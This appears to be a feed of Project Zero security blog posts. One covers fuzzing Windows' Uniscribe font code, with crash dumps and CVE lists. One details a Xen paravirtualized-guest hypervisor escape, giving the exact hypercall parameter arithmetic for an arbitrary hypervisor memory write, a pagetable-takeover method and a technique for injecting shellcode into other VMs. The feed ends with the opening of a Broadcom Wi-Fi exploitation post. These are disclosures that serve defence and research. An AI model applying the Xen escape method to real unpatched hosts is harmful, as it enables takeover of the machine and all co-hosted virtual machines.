Among the total of 119 vulnerabilities with CVEs fixed by Microsoft in the March Patch Tuesday a few weeks ago, there were 29 bugs reported by us in the font-handling code of the Uniscribe library. Admittedly the subject of font-related security has already been extensively discussed on this blog both in the context of manual analysis [1][2] and fuzzing [3][4]. However, what makes this effort a bit different from the previous ones is the fact that Uniscribe is a little-known user-mode component, which had not been widely recognized as a viable attack vector before, as opposed to the kernel-mode font implementations included in the win32k.sys and ATMFD.DLL drivers. In this post, we outline a brief history and description of Uniscribe, explain how we approached at-scale fuzzing of the library, and highlight some of the more interesting discoveries we have made so far. All the raw reports of the bugs we’re referring to (as they were submitted to Microsoft), together with the corresponding proof-of-concept samples, can be found in the official Project Zero bug tracker [5]. Enjoy!IntroductionIt was November 2016 when we started yet another iteration of our Windows font fuzzing job (whose architecture was thoroughly described in [4]). At that point, the kernel attack surface was mostly fuzz-clean with regards to the techniques we were using, but we still like to play with the configuration and input corpus from time to time to see if we can squeeze out any more bugs with the existing infrastructure. What we ended up with a several days later were a bunch of samples which supposedly crashed the guest Windows system running inside of Bochs. When we fed them to our reproduction pipeline, none of the bugchecks occurred again for unclear reasons. As disappointing as that was, there also was one interesting and unexpected result: for one of the test cases, the user-mode harness crashed itself, without bringing the whole OS down at the same time. This could indicate either that there was a bug in our code, or that there was some unanticipated font parsing going on in ring-3. When we started digging deeper, we found out that the unhandled exception took place in the following context:
(4464.11b4): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception may be expected and handled.eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nccs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246USP10!ScriptPositionSingleGlyph+0x28533:752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????
Until that moment, we didn’t fully realize that our tools were triggering any font-handling code beyond the well-known kernel implementation (despite some related bugs having been publicly fixed in the past, e.g. CVE-2016-7274 [6]). As a result, the fuzzing system was not prepared to catch user-mode faults, and thus any such crashes had remained completely undetected in favor of system bugchecks, which caused full machine restarts.
We quickly determined that the usp10.dll library corresponded to “Uniscribe Unicode script processor” (in Microsoft’s own words) [7]. It is a relatively large module (600-800 kB depending on system version and bitness) responsible for rendering Unicode-encoded text, as the name suggests. From a security perspective, it’s important that the code base dates back to Windows 2000, and includes a C++ implementation of the parsing of various complex TrueType/OpenType structures, in addition to what is already implemented in the kernel. The specific tables that Uniscribe touches on are primarily Advanced Typography Tables (“GDEF”, “GSUB”, “GPOS”, “BASE”, “JSTF”), but also “OS/2”, “cmap” and “maxp” to some extent. What’s equally significant is that the code can be reached simply by calling the DrawText [8] or other equivalent API with Unicode-encoded text and an attacker-controlled font. Since no special calls other than the typical ones are necessary to execute the most exposed areas of the library, it makes for a great attack vector in applications which use GDI to render text with fonts originating from untrusted sources. This is also evidenced by the stack trace of the original crash, and the fact that it occurred in a program which didn’t include any usp10-specific code:
0:000> kbChildEBP RetAddr0026ec2c 09340ffc USP10!otlChainRuleSetTable::rule+0x130026eccc 0133d7d2 USP10!otlChainingLookup::apply+0x7d30026ed48 0026f09c USP10!ApplyLookup+0x2610026ef4c 0026f078 USP10!ApplyFeatures+0x4810026ef98 09342f40 USP10!SubstituteOtlGlyphs+0x1bf0026efd4 0026f0b4 USP10!SubstituteOtlChars+0x2200026f250 0026f370 USP10!HebrewEngineGetGlyphs+0x6900026f310 0026f370 USP10!ShapingGetGlyphs+0x36a0026f3fc 09316318 USP10!ShlShape+0x2ef0026f440 09316318 USP10!ScriptShape+0x15f0026f4a0 0026f520 USP10!RenderItemNoFallback+0xfa0026f4cc 0026f520 USP10!RenderItemWithFallback+0x1040026f4f0 09316124 USP10!RenderItem+0x220026f534 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e90026f54c 0000000a USP10!ScriptStringAnalyse+0x2840026f598 0000000a LPK!LpkStringAnalyse+0xe50026f694 00000000 LPK!LpkCharsetDraw+0x3320026f6c8 00000000 LPK!LpkDrawTextEx+0x400026f708 00000000 USER32!DT_DrawStr+0x13c0026f754 0026fa30 USER32!DT_GetLineBreak+0x780026f800 0000000a USER32!DrawTextExWorker+0x2550026f824 ffffffff USER32!DrawTextExW+0x1e
As can be seen here, the Uniscribe functionality was invoked internally by user32.dll through the lpk.dll (Language Pack) library. As soon as we learned about this new attack vector, we jumped at the first chance to fuzz it. Most of the infrastructure was already in place, since both user- and kernel-mode font fuzzing share a large number of the pieces. The extra work that we had to do was mostly related to filtering the input corpus, fiddling with the mutator configuration, adjusting the system configuration and implementing logic for the detection of user-mode crashes (both in the test harness and Bochs instrumentation). All of these steps are discussed in detail below. After a few days, we had everything working as planned, and after another couple, there were already over 80 crashes at unique addresses waiting for triage. Below is a summary of the issues that were found in the first fuzzing run and reported to Microsoft in December 2016.Results at a glanceSince ~80 was still a fairly manageable number of crashes to triage manually, we tried to reproduce each of them by hand, deduplicating them and writing down their details at the same time. When we finished, we ended up with 8 separate high-severity issues that could potentially allow remote code execution:
Tracker IDMemory access type at crashCrashing functionCVE1022Invalid write of n bytes (memcpy)usp10!otlList::insertAtCVE-2017-01081023Invalid read / write of 2 bytesusp10!AssignGlyphTypesCVE-2017-00841025Invalid write of n bytes (memset)usp10!otlCacheManager::GlyphsSubstitutedCVE-2017-00861026Invalid write of n bytes (memcpy)usp10!MergeLigRecordsCVE-2017-00871027Invalid write of 2 bytesusp10!ttoGetTableDataCVE-2017-00881028Invalid write of 2 bytesusp10!UpdateGlyphFlagsCVE-2017-00891029Invalid write of n bytesusp10!BuildFSM and nearby functionsCVE-2017-00901030Invalid write of n bytesusp10!FillAlternatesListCVE-2017-0072
All of the bugs but one were triggered through a standard DrawText call and resulted in heap memory corruption. The one exception was the #1030 issue, which resided in a documented Uniscribe-specific ScriptGetFontAlternateGlyphs API function. The routine is responsible for retrieving a list of alternate glyphs for a specified character, and the interesting fact about the bug is that it wasn’t a problem with operating on any internal structures. Instead, the function failed to honor the value of the cMaxAlternates argument, and could therefore write more output data to the pAlternateGlyphs buffer than was allowed by the function caller. This meant that the buffer overflow was not specific to any particular memory type – depending on what pointer the client passed in, the overflow would take place on the stack, heap or static memory. The exploitability of such a bug would greatly depend on the program design and compilation options used to build it. We must admit, however, that it is unclear what the real-world clients of the function are, and whether any of them would meet the requirements to become a viable attack target.
Furthermore, we extracted 27 unique crashes caused by invalid memory reads from non-NULL addresses, which could potentially lead to information disclosure of secrets stored in the process address space. Due to the large volume of these crashes, we were unable to analyze each of them in much detail or perform any advanced deduplication. Instead, we partitioned them by the top-level exception address, and filed all of them as a single entry #1031 in the bug tracker:
  1. usp10!otlMultiSubstLookup::apply+0xa8
  2. usp10!otlSingleSubstLookup::applyToSingleGlyph+0x98
  3. usp10!otlSingleSubstLookup::apply+0xa9
  4. usp10!otlMultiSubstLookup::getCoverageTable+0x2c
  5. usp10!otlMark2Array::mark2Anchor+0x18
  6. usp10!GetSubstGlyph+0x2e
  7. usp10!BuildTableCache+0x1ca
  8. usp10!otlMkMkPosLookup::apply+0x1b4
  9. usp10!otlLookupTable::markFilteringSet+0x1a
  10. usp10!otlSinglePosLookup::getCoverageTable+0x12
  11. usp10!BuildTableCache+0x1e7
  12. usp10!otlChainingLookup::getCoverageTable+0x15
  13. usp10!otlReverseChainingLookup::getCoverageTable+0x15
  14. usp10!otlLigCaretListTable::coverage+0x7
  15. usp10!otlMultiSubstLookup::apply+0x99
  16. usp10!otlTableCacheData::FindLookupList+0x9
  17. usp10!ttoGetTableData+0x4b4
  18. usp10!GetSubtableCoverage+0x1ab
  19. usp10!otlChainingLookup::apply+0x2d
  20. usp10!MergeLigRecords+0x132
  21. usp10!otlLookupTable::subTable+0x23
  22. usp10!GetMaxParameter+0x53
  23. usp10!ApplyLookup+0xc3
  24. usp10!ApplyLookupToSingleGlyph+0x6f
  25. usp10!ttoGetTableData+0x19f6
  26. usp10!otlExtensionLookup::extensionSubTable+0x1d
  27. usp10!ttoGetTableData+0x1a77

In the end, it turned out that these 27 crashes manifested 21 actual bugs, which were fixed by Microsoft as CVE-2017-0083, CVE-2017-0091, CVE-2017-0092 and CVE-2017-0111 to CVE-2017-0128 in the MS17-011 security bulletin.
Lastly, we also reported 7 unique NULL pointer dereference issues with no deadline, with the hope that having any of them fixed would potentially enable our fuzzer to discover other, more severe bugs. On March 17th, MSRC responded that they investigated the cases and concluded that they were low-severity DoS problems only, and would not be fixed as part of a security bulletin in the near future. Input corpus, mutation configuration and adjusting the test harnessGathering a solid corpus of input samples is arguably one of the most important parts of fuzzing preparation, especially if code coverage feedback is not involved, making it impossible for the corpus to gradually evolve into a more optimal form. We were lucky enough to already have had several font corpora at our disposal from previous fuzzing runs. We decided to use the same set of files that had helped us discover 18 Windows kernel bugs in the past (see the “Preparing the input corpus” section of [4]). It was originally generated by running a corpus distillation algorithm over a large number of fonts crawled off the web, using an instrumented build of the FreeType2 open-source library, and consisted of 14848 TrueType and 4659 OpenType files, for a total of 2.4G of disk space. In order to tailor the corpus better for Uniscribe, we reduced it to just the files that contained at least one of the “GDEF”, “GSUB”, “GPOS”, “BASE” or “JSTF” tables, which are parsed by the library. This left us with 3768 TrueType and 2520 OpenType fonts consuming 1.68G on disk, which were much more likely to expose bugs in Uniscribe than any of the removed ones. That was the final corpus that we worked with.
The mutator configuration was also pretty similar to what we did for the kernel: we used the same five standard bitflipping, byteflipping, chunkspew, special ints and binary arithmetic algorithms with the precalculated per-table mutation ratio ranges. The only change made specifically for Uniscribe was to add mutations for the “BASE” and “JSTF” tables, which were previously not accounted for.
Last but not least, we extended the functionality of the guest fuzzing harness, responsible for invoking the tested font-related API (mostly displaying all of the font’s glyphs at various point sizes, but also querying a number of properties etc.). While it was clear that some of the relevant code was executed automatically through user32!DrawText with no modifications required, we wanted to maximize the coverage of Uniscribe code as much possible. A full reference of all its externally available functions can be found on MSDN [9]. After skimming through the documentation, we added calls to ScriptCacheGetHeight, ScriptGetFontProperties, ScriptGetCMap, ScriptGetFontAlternateGlyphs, ScriptSubstituteSingleGlyph and ScriptFreeCache. This quickly proved to be a successful idea, as it allowed us to discover the aforementioned generic bug in ScriptGetFontAlternateGlyphs. Furthermore, we decided to remove invocations of the GetKerningPairs and GetGlyphOutline API functions, as their corresponding logic was located in the kernel, while our focus had now shifted strictly to user-mode. As such, they wouldn’t lead to the discovery of any new bugs in Uniscribe, but would instead slow the overall fuzzing process down. Apart from these minor modifications, the core of the test harness remained unchanged.
By taking the measures listed above, we hoped that they were sufficient to trigger most of the low hanging fruit bugs. With this assumption, the only part left was to make sure that the crashes would be reliably caught and reported to the fuzzer. This subject is discussed in the next section.Crash detectionThe first step we took to detect Uniscribe crashes effectively was disabling Special Pools for win32k.sys and ATMFD.DLL (which caused unnecessary overhead for no gain in user-mode), while enabling the PageHeap option in Application Verifier for the harness process. This was done to improve our chances at detecting invalid memory accesses, and make reproduction and deduplication more reliable.
Thanks to the fact that the fuzz-tested code in usp10.dll executed in the same context as the rest of the harness logic, we didn’t have to write a full-fledged Windows debugger to supervise another process. Instead, we just set up a top-level exception handler with the SetUnhandledExceptionFilter function, which then got called every time a fatal exception was generated in the process. The handler’s job was to send out the state of the crashing CPU context (passed in through ExceptionInfo->ContextRecord) to the hypervisor (i.e. the Bochs instrumentation) through the “debug print” hypercall, and then actually report that the crash occurred at the specific address.
In the kernel font fuzzing scenario, crashes were detected by the Bochs instrumentation with the BX_INSTR_RESET instrumentation callback. This approach worked because the guest system was configured to automatically reboot on bugcheck, consequently triggering the bx_instr_reset handler. The easiest way to integrate this approach with user-mode fuzzing would be therefore to just add a ExitWindowsEx call in the epilogue of the exception handler, making everything work out of the box without even touching the existing Bochs instrumentation. However, the method would result in losing information about the crash location, making automated deduplication impossible. In order to address this problem, we introduced a new “crash encountered” hypercall, which received the address of the faulting instruction in the argument from the guest, and passed this information further down our scalable fuzzing infrastructure. Having the crashes grouped by the exception address right from the start saved us a ton of postprocessing time, and limited the number of test cases we had to look at to a bare minimum.
This is the end of a list of differences between the Windows kernel font fuzzing setup we’ve been using for nearly two years now, and an equivalent setup for user-mode fuzzing that we only built a few months ago, but has already proven very effective. Everything else has remained the same as described in the “font fuzzing techniques” article from last year [4].ConclusionsIt is a fascinating but dire realization that even for such a well known class of bug hunting targets as font parsing implementations, it is still possible to discover new attack vectors dating back to the previous century, having remained largely unaudited until now, and being as exposed as the interfaces we already know about. We believe that this is a great example of how gradually rising the bar for a variety of software can have much more impact than trying to kill every last bug in a narrow range of code. It is also illustrative of the fact that the time spent on thoroughly analyzing the attack surface and looking for little-known targets may turn out very fruitful, as the security community still doesn’t have a full understanding of the attack vectors in every important data processing stack (such as the Windows font handling in this case).
This effort and its results show that fuzzing is a very universal technique, and most of its components can be easily reused from one target to another, especially within the scope of a single file format. Finally, it has proven that it is possible to fuzz not just the Windows kernel, but also regular user-mode code, regardless of the environment of the host system (which was Linux in our case). While the Bochs x86 emulator incurs a significant overhead as compared to native execution speed, it can often be scaled against to still achieve a net gain in the number of iterations per second. As an interesting fact, issues #993 (Windows kernel registry hive loading), #1042 (EMF+ processing in GDI+), #1052 and #1054 (color profile processing) fixed in the last Patch Tuesday were also found with fuzzing Windows on Bochs, but with slightly different input samples, test harnesses and mutation strategies. :)References
  1. The “One font vulnerability to rule them all” series starting with https://googleprojectzero.blogspot.com/2015/07/one-font-vulnerability-to-rule-them-all.html
  2. https://googleprojectzero.blogspot.com/2015/09/enabling-qr-codes-in-internet-explorer.html
  3. https://googleprojectzero.blogspot.com/2016/06/a-year-of-windows-kernel-font-fuzzing-1_27.html
  4. https://googleprojectzero.blogspot.com/2016/07/a-year-of-windows-kernel-font-fuzzing-2.html
  5. https://bugs.chromium.org/p/project-zero/issues/list?can=1&q=product%3Auniscribe+fixed%3A2017-mar-14
  6. http://blogs.flexerasoftware.com/secunia-research/2016/12/microsoft_windows_loaduvstable_heap_based_buffer_overflow_vulnerability.html
  7. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd374091(v=vs.85).aspx
  8. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd162498%28v=vs.85%29.aspx
  9. https://msdn.microsoft.com/pl-pl/library/windows/desktop/dd374093(v=vs.85).aspx
Categories: Security

Pandavirtualization: Exploiting the Xen hypervisor

Fri, 04/07/2017 - 09:20
Posted by Jann Horn, Project Zero
On 2017-03-14, I reported a bug to Xen's security team that permits an attacker with control over the kernel of a paravirtualized x86-64 Xen guest to break out of the hypervisor and gain full control over the machine's physical memory. The Xen Project publicly released an advisory and a patch for this issue 2017-04-04.
To demonstrate the impact of the issue, I created an exploit that, when executed in one 64-bit PV guest with root privileges, will execute a shell command as root in all other 64-bit PV guests (including dom0) on the same physical machine.Backgroundaccess_ok()On x86-64, Xen PV guests share the virtual address space with the hypervisor. The coarse memory layout looks as follows:

Xen allows the guest kernel to perform hypercalls, which are essentially normal system calls from the guest kernel to the hypervisor using the System V AMD64 ABI. They are performed using the syscall instruction, with up to six arguments passed in registers. Like normal syscalls, Xen hypercalls often take guest pointers as arguments. Because the hypervisor shares its address space, it makes sense for guests to simply pass in guest-virtual pointers.
Like any kernel, Xen has to ensure that guest-virtual pointers don't actually point to hypervisor-owned memory before dereferencing them. It does this using userspace accessors that are similar to those in the Linux kernel; for example:
  • access_ok(addr, size) for checking whether a guest-supplied virtual memory range is safe to access - in other words, it checks that accessing the memory range will not modify hypervisor memory
  • __copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd without checking whether hnd is safe
  • copy_to_guest(hnd, ptr, nr) for copying nr bytes from the hypervisor address ptr to the guest address hnd if hnd is safe

In the Linux kernel, the macro access_ok() checks whether the whole memory range from addr to addr+size-1 is safe to access, using any memory access pattern. However, Xen's access_ok() doesn't guarantee that much:
/* * Valid if in +ve half of 48-bit address space, or above Xen-reserved area. * This is also valid for range checks (addr, addr+size). As long as the * start address is outside the Xen-reserved area then we will access a * non-canonical address (and thus fault) before ever reaching VIRT_START. */#define __addr_ok(addr) \    (((unsigned long)(addr) < (1UL<<47)) || \     ((unsigned long)(addr) >= HYPERVISOR_VIRT_END))
#define access_ok(addr, size) \    (__addr_ok(addr) || is_compat_arg_xlat_range(addr, size))
Xen normally only checks that addr points into the userspace area or the kernel area without checking size. If the actual guest memory access starts roughly at addr, proceeds linearly without skipping gigantic amounts of memory and bails out as soon as a guest memory access fails, only checking addr is sufficient because of the large range of non-canonical addresses, which serve as a large guard area. However, if a hypercall wants to access a guest buffer starting at a 64-bit offset, it needs to ensure that the access_ok() check is performed using the correct offset - checking the whole userspace buffer is unsafe!
Xen provides wrappers around access_ok() for accessing arrays in guest memory. If you want to check whether it's safe to access an array starting at element 0, you can use guest_handle_okay(hnd, nr). However, if you want to check whether it's safe to access an array starting at a different element, you need to use guest_handle_subrange_okay(hnd, first, last).
When I saw the definition of access_ok(), the lack of security guarantees actually provided by access_ok() seemed rather unintuitive to me, so I started searching for its callers, wondering whether anyone might be using it in an unsafe way.Hypercall PreemptionWhen e.g. a scheduler tick happens, Xen needs to be able to quickly switch from the currently executing vCPU to another VM's vCPU. However, simply interrupting the execution of a hypercall won't work (e.g. because the hypercall could be holding a spinlock), so Xen (like other operating systems) needs some mechanism to delay the vCPU switch until it's safe to do so.
In Xen, hypercalls are preempted using voluntary preemption: Any long-running hypercall code is expected to regularly call hypercall_preempt_check() to check whether the scheduler wants to schedule to another vCPU. If this happens, the hypercall code exits to the guest, thereby signalling to the scheduler that it's safe to preempt the currently-running task, after adjusting the hypercall arguments (in guest registers or guest memory) so that as soon as the current vCPU is scheduled again, it will re-enter the hypercall and perform the remaining work. Hypercalls don't distinguish between normal hypercall entry and hypercall re-entry after preemption.
This hypercall re-entry mechanism is used in Xen because Xen does not have one hypervisor stack per vCPU; it only has one hypervisor stack per physical core. This means that while other operating systems (e.g. Linux) can simply leave the state of an interrupted syscall on the kernel stack, Xen can't do that as easily.
This design means that for some hypercalls, to allow them to properly resume their work, additional data is stored in guest memory that could potentially be manipulated by the guest to attack the hypervisor.memory_exchange()The hypercall HYPERVISOR_memory_op(XENMEM_exchange, arg) invokes the function memory_exchange(arg) in xen/common/memory.c. This function allows a guest to "trade in" a list of physical pages that are currently assigned to the guest in exchange for new physical pages with different restrictions on their physical contiguity. This is useful for guests that want to perform DMA because DMA requires physically contiguous buffers.
The hypercall takes a struct xen_memory_exchange as argument, which is defined as follows:
struct xen_memory_reservation {    /* [...] */    XEN_GUEST_HANDLE(xen_pfn_t) extent_start; /* in: physical page list */
   /* Number of extents, and size/alignment of each (2^extent_order pages). */    xen_ulong_t    nr_extents;    unsigned int   extent_order;
   /* XENMEMF flags. */    unsigned int   mem_flags;
   /*     * Domain whose reservation is being changed.     * Unprivileged domains can specify only DOMID_SELF.     */    domid_t        domid;};
struct xen_memory_exchange {    /*     * [IN] Details of memory extents to be exchanged (GMFN bases).     * Note that @in.address_bits is ignored and unused.     */    struct xen_memory_reservation in;
   /*     * [IN/OUT] Details of new memory extents.     * We require that:     *  1. @in.domid == @out.domid     *  2. @in.nr_extents  << @in.extent_order ==     *     @out.nr_extents << @out.extent_order     *  3. @in.extent_start and @out.extent_start lists must not overlap     *  4. @out.extent_start lists GPFN bases to be populated     *  5. @out.extent_start is overwritten with allocated GMFN bases     */    struct xen_memory_reservation out;
   /*     * [OUT] Number of input extents that were successfully exchanged:     *  1. The first @nr_exchanged input extents were successfully     *     deallocated.     *  2. The corresponding first entries in the output extent list correctly     *     indicate the GMFNs that were successfully exchanged.     *  3. All other input and output extents are untouched.     *  4. If not all input exents are exchanged then the return code of this     *     command will be non-zero.     *  5. THIS FIELD MUST BE INITIALISED TO ZERO BY THE CALLER!     */    xen_ulong_t nr_exchanged;};
The fields that are relevant for the bug are in.extent_start, in.nr_extents, out.extent_start, out.nr_extents and nr_exchanged.
nr_exchanged is documented as always being initialized to zero by the guest - this is because it is not only used to return a result value, but also for hypercall preemption. When memory_exchange() is preempted, it stores its progress in nr_exchanged, and the next execution of memory_exchange() uses the value of nr_exchanged to decide at which point in the input arrays in.extent_start and out.extent_start it should resume.
Originally, memory_exchange() did not check the userspace array pointers at all before accessing them with __copy_from_guest_offset() and __copy_to_guest_offset(), which do not perform any checks themselves - so by supplying hypervisor pointers, it was possible to cause Xen to read from and write to hypervisor memory - a pretty severe bug. This was discovered in 2012 (XSA-29, CVE-2012-5513) and fixed as follows (https://xenbits.xen.org/xsa/xsa29-4.1.patch):
diff --git a/xen/common/memory.c b/xen/common/memory.cindex 4e7c234..59379d3 100644--- a/xen/common/memory.c+++ b/xen/common/memory.c@@ -289,6 +289,13 @@ static long memory_exchange(XEN_GUEST_HANDLE(xen_memory_exchange_t) arg)         goto fail_early;     } +    if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||+         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )+    {+        rc = -EFAULT;+        goto fail_early;+    }+     /* Only privileged guests can allocate multi-page contiguous extents. */     if ( !multipage_allocation_permitted(current->domain,                                          exch.in.extent_order) ||The bugAs can be seen in the following code snippet, the 64-bit resumption offset nr_exchanged, which can be controlled by the guest because of Xen's hypercall resumption scheme, can be used by the guest to choose an offset from out.extent_start at which the hypervisor should write:
static long memory_exchange(XEN_GUEST_HANDLE_PARAM(xen_memory_exchange_t) arg){    [...]
   /* Various sanity checks. */    [...]
   if ( !guest_handle_okay(exch.in.extent_start, exch.in.nr_extents) ||         !guest_handle_okay(exch.out.extent_start, exch.out.nr_extents) )    {        rc = -EFAULT;        goto fail_early;    }
   [...]
   for ( i = (exch.nr_exchanged >> in_chunk_order);          i < (exch.in.nr_extents >> in_chunk_order);          i++ )    {        [...]        /* Assign each output page to the domain. */        for ( j = 0; (page = page_list_remove_head(&out_chunk_list)); ++j )        {            [...]            if ( !paging_mode_translate(d) )            {                [...]                if ( __copy_to_guest_offset(exch.out.extent_start,                                            (i << out_chunk_order) + j,                                            &mfn, 1) )                    rc = -EFAULT;            }        }        [...]    }    [...]}
However, the guest_handle_okay() check only checks whether it would be safe to access the guest array exch.out.extent_start starting at offset 0; guest_handle_subrange_okay() would have been correct. This means that an attacker can write an 8-byte value to an arbitrary address in hypervisor memory by choosing:
  • exch.in.extent_order and exch.out.extent_order as 0 (exchanging page-sized blocks of physical memory for new page-sized blocks)
  • exch.out.extent_start and exch.nr_exchanged so that exch.out.extent_start points to userspace memory while exch.out.extent_start+8*exch.nr_exchanged points to the target address in hypervisor memory, with exch.out.extent_start close to NULL; this can be calculated as exch.out.extent_start=target_addr%8, exch.nr_exchanged=target_addr/8.
  • exch.in.nr_extents and exch.out.nr_extents as exch.nr_exchanged+1
  • exch.in.extent_start as input_buffer-8*exch.nr_exchanged (where input_buffer is a legitimate guest kernel pointer to a physical page number that is currently owned by the guest). This is guaranteed to always point to the guest userspace range (and therefore pass the access_ok() check) because exch.out.extent_start roughly points to the start of the userspace address range and the hypervisor and guest kernel address ranges together are only as big as the userspace address range.

The value that is written to the attacker-controlled address is a physical page number (physical address divided by the page size).Exploiting the bug: Gaining pagetable controlEspecially on a busy system, controlling the page numbers that are written by the kernel might be difficult. Therefore, for reliable exploitation, it makes sense to treat the bug as a primitive that permits repeatedly writing 8-byte values at controlled addresses, with the most significant bits being zeroes (because of the limited amount of physical memory) and the least significant bits being more or less random. For my exploit, I decided to treat this primitive as one that writes an essentially random byte followed by seven bytes of garbage.
It turns out that for an x86-64 PV guest, such a primitive is sufficient for reliably exploiting the hypervisor for the following reasons:
  • x86-64 PV guests know the real physical page numbers of all pages they can access
  • x86-64 PV guests can map live pagetables (from all four paging levels) belonging to their domain as readonly; Xen only prevents mapping them as writable
  • Xen maps all physical memory as writable at 0xffff830000000000 (in other words, the hypervisor can write to any physical page, independent of the protections using which it is mapped in other places, by writing to physical_address+0xffff830000000000).

The goal of the attack is to point an entry in a live level 3 pagetable (which I'll call "victim pagetable") to a page to which the guest has write access (which I'll call "fake pagetable"). This means that the attacker has to write an 8-byte value, containing the physical page number of the fake pagetable and some flags, into an entry in the victim pagetable, and ensure that the following 8-byte pagetable entry stays disabled (e.g. by setting the first byte of the following entry to zero). Essentially, the attacker has to write 9 controlled bytes followed by 7 bytes that don't matter.
Because the physical page numbers of all relevant pages and the address of the writable mapping of all physical memory are known to the guest, figuring out where to write and what value to write is easy, so the only remaining problem is how to use the primitive to actually write data.
Because the attacker wants to use the primitive to write to a readable page, the "write one random byte followed by 7 bytes of garbage" primitive can easily be converted to a "write one controlled byte followed by 7 bytes of garbage" primitive by repeatedly writing a random byte and reading it back until the value is right. Then, the "write one controlled byte followed by 7 bytes of garbage" primitive can be converted to a "write controlled data followed by 7 bytes of garbage" primitive by writing bytes to consecutive addresses - and that's exactly the primitive needed for the attack.
At this point, the attacker can control a live pagetable, which allows the attacker to map arbitrary physical memory into the guest's virtual address space. This means that the attacker can reliably read from and write to the memory, both code and data, of the hypervisor and all other VMs on the system.Running shell commands in other VMsAt this point, the attacker has full control over the machine, equivalent to the privilege level of the hypervisor, and can easily steal secrets by searching through physical memory; and a realistic attacker probably wouldn't want to inject code into VMs, considering how much more detectable that makes an attack.
But running an arbitrary shell command in other VMs makes the severity more obvious (and it looks cooler), so for fun, I decided to continue my exploit so that it injects a shell command into all other 64-bit PV domains.
As a first step, I wanted to reliably gain code execution in hypervisor context. Given the ability to read and write physical memory, one relatively OS- (or hypervisor-)independent way to call an arbitrary address with kernel/hypervisor privileges is to locate the Interrupt Descriptor Table using the unprivileged SIDT instruction, write an IDT entry with DPL 3 and raise the interrupt. (Intel's upcoming Cannon Lake CPUs are apparently going to support User-Mode Instruction Prevention (UMIP), which will finally make SIDT a privileged instruction.) Xen supports SMEP and SMAP, so it isn't possible to just point the IDT entry at guest memory, but using the ability to write pagetable entries, it is possible to map a guest-owned page with hypervisor-context shellcode as non-user-accessible, which allows it to run despite SMEP.
Then, in hypervisor context, it is possible to hook the syscall entry point by reading and writing the IA32_LSTAR MSR. The syscall entry point is used both for syscalls from guest userspace and for hypercalls from guest kernels. By mapping an attacker-controlled page into guest-user-accessible memory, changing the register state and invoking sysret, it is possible to divert the execution of guest userspace code to arbitrary guest user shellcode, independent of the hypervisor or the guest operating system.
My exploit injects shellcode into all guest userspace processes that is invoked on every write() syscall. Whenever the shellcode runs, it checks whether it is running with root privileges and whether a lockfile doesn't exist in the guest's filesystem yet. If these conditions are fulfilled, it uses the clone() syscall to create a child process that runs an arbitrary shell command.
(Note: My exploit doesn't clean up after itself on purpose, so when the attacking domain is shut down later, the hooked entry point will quickly cause the hypervisor to crash.)
Here is a screenshot of a successful attack against Qubes OS 3.2, which uses Xen as its hypervisor. The exploit is executed in the unprivileged domain "test124"; the screenshot shows that it injects code into dom0 and the firewallvm:



ConclusionI believe that the root cause of this issue were the weak security guarantees made by access_ok(). The current version of access_ok() was committed in 2005, two years after the first public release of Xen and long before the first XSA was released. It seems like old code tends to contain relatively straightforward weaknesses more often than newer code because it was committed with less scrutiny regarding security issues, and such old code is then often left alone.
When security-relevant code is optimized based on assumptions, care must be taken to reliably prevent those assumptions from being violated. access_ok() actually used to check whether the whole range overlaps hypervisor memory, which would have prevented this bug from occurring. Unfortunately, in 2005, a commit with "x86_64 fixes/cleanups" was made that changed the behavior of access_ok() on x86_64 to the current one. As far as I can tell, the only reason this didn't immediately make the MEMOP_increase_reservation and MEMOP_decrease_reservation hypercalls vulnerable is that the nr_extents argument of do_dom_mem_op() was only 32 bits wide - a relatively brittle defense.
While there have been several Xen vulnerabilities that only affected PV guests because the issues were in code that is unnecessary when dealing with HVM guests, I believe that this isn't one of them. Accessing guest virtual memory is much more straightforward for PV guests than for HVM guests: For PV guests, raw_copy_from_guest() calls copy_from_user(), which basically just does a bounds check followed by a memcpy with pagefault fixup - the same thing normal operating system kernels do when accessing userspace memory. For HVM guests, raw_copy_from_guest() calls copy_from_user_hvm(), which has to do a page-wise copy (because the memory area might be physically non-contiguous and the hypervisor doesn't have a contiguous virtual mapping of it) with guest pagetable walks (to translate guest virtual addresses to guest physical addresses) and guest frame lookups for every page, including reference counting, mapping guest pages into hypervisor memory and various checks to e.g. prevent HVM guests from writing to readonly grant mappings. So for HVM, the complexity of handling guest memory accesses is actually higher than for PV.
For security researchers, I think that a lesson from this is that paravirtualization is not much harder to understand than normal kernels. If you've audited kernel code before, the hypercall entry path (lstar_enter and int80_direct_trap in xen/arch/x86/x86_64/entry.S) and the basic design of hypercall handlers (for x86 PV: listed in the pv_hypercall_table in xen/arch/x86/pv/hypercall.c) should look more or less like normal syscalls.

Categories: Security

Over The Air: Exploiting Broadcom’s Wi-Fi Stack (Part 1)

Tue, 04/04/2017 - 11:51
Posted by Gal Beniamini, Project Zero
It’s a well understood fact that platform security is an integral part of the security of complex systems. For mobile devices, this statement rings even truer; modern mobile platforms include multiple processing units, all elaborately communicating with one another. While the code running on the application processor (AP) has been the subject of much research, other components have seldom received the same scrutiny.

Over the years, as a result of the focused attention by security folk, the defenses of code running on the application processor have been reinforced. Taking Android as a case study, this includes hardening the operating system, improving the security of applications, and introducing incremental security enhancements affecting the entire system. All positive improvements, no doubt. However, attackers tend to follow the path of least resistance. Improving the security of one component will inevitably cause some attackers to start looking elsewhere for an easier point of entry.
